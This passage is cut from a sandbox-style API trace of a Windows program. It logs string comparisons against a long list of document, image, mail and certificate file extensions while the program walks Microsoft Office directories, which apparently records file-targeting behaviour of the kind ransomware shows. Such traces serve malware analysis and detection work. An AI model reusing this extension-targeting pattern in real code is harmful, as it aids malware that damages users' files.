(lpString1=".dat", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".db", lpString2="DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".dbx", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".dc3", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".dcm", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".dcr", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".der", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".dib", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".dic", lpString2=".DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".dif", lpString2=".DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".divx", lpString2="N.DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".djvu", lpString2="N.DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".dng", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".docm", lpString2="N.DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".docx", lpString2="N.DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".dot", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".dotm", lpString2="N.DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".dotx", lpString2="N.DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".dpx", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".dqy", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".dsn", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".dt", lpString2="DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".dtd", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".dwg", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".dwt", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".dx", lpString2="DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".dxf", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".edml", lpString2="N.DLL") returned -1 [0043.697] lstrcmpiW (lpString1=".efd", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".elf", lpString2=".DLL") returned 1 [0043.697] lstrcmpiW (lpString1=".emf", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".emz", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".epf", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".eps", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".epsf", lpString2="N.DLL") returned -1 [0043.698] lstrcmpiW (lpString1=".epsp", lpString2="N.DLL") returned -1 [0043.698] lstrcmpiW (lpString1=".erf", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".exr", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".f4v", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".fido", lpString2="N.DLL") returned -1 [0043.698] lstrcmpiW (lpString1=".flm", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".flv", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".frm", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".fxg", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".geo", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".gif", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".grs", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".gz", lpString2="DLL") returned -1 [0043.698] lstrcmpiW (lpString1=".h", lpString2="LL") returned -1 [0043.698] lstrcmpiW (lpString1=".hdr", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".hpp", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".htc", lpString2=".DLL") returned 1 [0043.698] lstrcmpiW (lpString1=".htm", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".html", lpString2="N.DLL") returned -1 [0043.699] lstrcmpiW (lpString1=".icb", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".iff", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".inc", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".indd", lpString2="N.DLL") returned -1 [0043.699] lstrcmpiW (lpString1=".ini", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".iqy", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".j2c", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".j2k", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".java", lpString2="N.DLL") returned -1 [0043.699] lstrcmpiW (lpString1=".jp2", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".jpc", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".jpe", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".jpeg", lpString2="N.DLL") returned -1 [0043.699] lstrcmpiW (lpString1=".jpf", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".jpx", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".js", lpString2="DLL") returned -1 [0043.699] lstrcmpiW (lpString1=".jsf", lpString2=".DLL") returned 1 [0043.699] lstrcmpiW (lpString1=".json", lpString2="N.DLL") returned -1 [0043.699] lstrcmpiW (lpString1=".jsp", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".kdc", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".kmz", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".kwm", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".lasso", lpString2="EN.DLL") returned -1 [0043.700] lstrcmpiW (lpString1=".lbi", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".lgf", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".lgp", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".log", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".m1v", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".m4a", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".m4v", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".max", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".md", lpString2="DLL") returned -1 [0043.700] lstrcmpiW (lpString1=".mda", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mdb", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mde", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mdf", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mdw", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mef", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mft", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mfw", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mht", lpString2=".DLL") returned 1 [0043.700] lstrcmpiW (lpString1=".mhtml", lpString2="EN.DLL") returned -1 [0043.701] lstrcmpiW (lpString1=".mka", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mkidx", lpString2="EN.DLL") returned -1 [0043.701] lstrcmpiW (lpString1=".mkv", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mos", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mov", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mp4", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mpeg", lpString2="N.DLL") returned -1 [0043.701] lstrcmpiW (lpString1=".mpg", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mpv", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mrw", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".msg", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".mxl", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".myd", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".myi", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".nef", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".nrw", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".obj", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".odb", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".odc", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".odm", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".odp", lpString2=".DLL") returned 1 [0043.701] lstrcmpiW (lpString1=".ods", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".oft", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".one", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".onepkg", lpString2="3EN.DLL") returned -1 [0043.702] lstrcmpiW (lpString1=".onetoc2", lpString2="R3EN.DLL") returned -1 [0043.702] lstrcmpiW (lpString1=".opt", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".oqy", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".orf", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".p12", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".p7b", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".p7c", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pam", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pbm", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pct", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pcx", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pdd", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pdp", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pef", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pem", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pff", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pfm", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pfx", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".pgm", lpString2=".DLL") returned 1 [0043.702] lstrcmpiW (lpString1=".php", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".php3", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".php4", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".php5", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".phtml", lpString2="EN.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".pict", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".pl", lpString2="DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".pls", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".pm", lpString2="DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".png", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".pnm", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".pot", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".potm", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".potx", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".ppa", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".ppam", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".ppm", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".pps", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".ppsm", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0043.703] lstrcmpiW (lpString1=".pptm", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".pptx", lpString2="N.DLL") returned -1 [0043.703] lstrcmpiW (lpString1=".prn", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".ps", lpString2="DLL") returned -1 [0043.704] lstrcmpiW (lpString1=".psb", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".psd", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".pst", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".ptx", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".pub", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".pwm", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".pxr", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".py", lpString2="DLL") returned -1 [0043.704] lstrcmpiW (lpString1=".qt", lpString2="DLL") returned -1 [0043.704] lstrcmpiW (lpString1=".r3d", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".raf", lpString2=".DLL") returned 1 [0043.704] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0043.704] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdcf7a00, ftCreationTime.dwHighDateTime=0x1ca60f4, ftLastAccessTime.dwLowDateTime=0x97748b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfdcf7a00, ftLastWriteTime.dwHighDateTime=0x1ca60f4, nFileSizeHigh=0x0, nFileSizeLow=0x517800, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3EN.DLL", cAlternateFileName="")) returned 0 [0043.704] FindClose (in: hFindFile=0x3ed13c0 | out: hFindFile=0x3ed13c0) returned 1 [0043.704] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0043.704] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa44929a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa44929a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa44929a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0043.704] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa44929a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa44929a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa44929a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed13c0 [0043.705] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa44929a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa44929a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa44929a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.705] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c189700, ftCreationTime.dwHighDateTime=0x1cba080, ftLastAccessTime.dwLowDateTime=0xa4551080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6c189700, ftLastWriteTime.dwHighDateTime=0x1cba080, nFileSizeHigh=0x0, nFileSizeLow=0xc6f390, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3FR.DLL", cAlternateFileName="")) returned 1 [0043.705] FindClose (in: hFindFile=0x3ed13c0 | out: hFindFile=0x3ed13c0) returned 1 [0043.705] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0043.705] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0043.705] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed13c0 [0043.705] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.705] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a86c00, ftCreationTime.dwHighDateTime=0x1ca60f4, ftLastAccessTime.dwLowDateTime=0x54f4210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6a86c00, ftLastWriteTime.dwHighDateTime=0x1ca60f4, nFileSizeHigh=0x0, nFileSizeLow=0x227c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3ES.DLL", cAlternateFileName="")) returned 1 [0043.705] FindClose (in: hFindFile=0x3ed13c0 | out: hFindFile=0x3ed13c0) returned 1 [0043.706] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0043.706] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69511700, ftCreationTime.dwHighDateTime=0x1c4a9a0, ftLastAccessTime.dwLowDateTime=0x97e6cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69511700, ftLastWriteTime.dwHighDateTime=0x1c4a9a0, nFileSizeHigh=0x0, nFileSizeLow=0x39cf3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3EN.LEX", cAlternateFileName="")) returned 1 [0043.706] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.707] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f42090 | out: hHeap=0x5f0000) returned 1 [0043.707] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd656b340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROPMGR.DLL", cAlternateFileName="")) returned 1 [0043.707] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59413f90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a1819b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a1819b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.872] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59413f90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a1819b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a1819b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.872] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcde5600, ftCreationTime.dwHighDateTime=0x1c458e1, ftLastAccessTime.dwLowDateTime=0x59413f90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcde5600, ftLastWriteTime.dwHighDateTime=0x1c458e1, nFileSizeHigh=0x0, nFileSizeLow=0xca60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSPUB10.BDR", cAlternateFileName="")) returned 1 [0043.877] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.878] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f42090 | out: hHeap=0x5f0000) returned 1 [0043.879] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82aef100, ftCreationTime.dwHighDateTime=0x1cab8a8, ftLastAccessTime.dwLowDateTime=0x5a7450f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82aef100, ftLastWriteTime.dwHighDateTime=0x1cab8a8, nFileSizeHigh=0x0, nFileSizeLow=0xddf78, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBCONV.DLL", cAlternateFileName="")) returned 1 [0043.884] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x511e6c70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70959970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70959970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.885] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x511e6c70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70959970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70959970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.885] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e2a200, ftCreationTime.dwHighDateTime=0x1c4a10f, ftLastAccessTime.dwLowDateTime=0x5e953370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9e2a200, ftLastWriteTime.dwHighDateTime=0x1c4a10f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCSBAR.POC", cAlternateFileName="")) returned 1 [0043.895] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0043.895] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f42090 | out: hHeap=0x5f0000) returned 1 [0043.895] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa5ff110, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QUERIES", cAlternateFileName="")) returned 1 [0043.895] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa5ff110, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0043.897] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa5ff110, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.897] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49110e00, ftCreationTime.dwHighDateTime=0x1bf97c1, ftLastAccessTime.dwLowDateTime=0xfa5ff110, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x49110e00, ftLastWriteTime.dwHighDateTime=0x1bf97c1, nFileSizeHigh=0x0, nFileSizeLow=0xcd, dwReserved0=0x0, 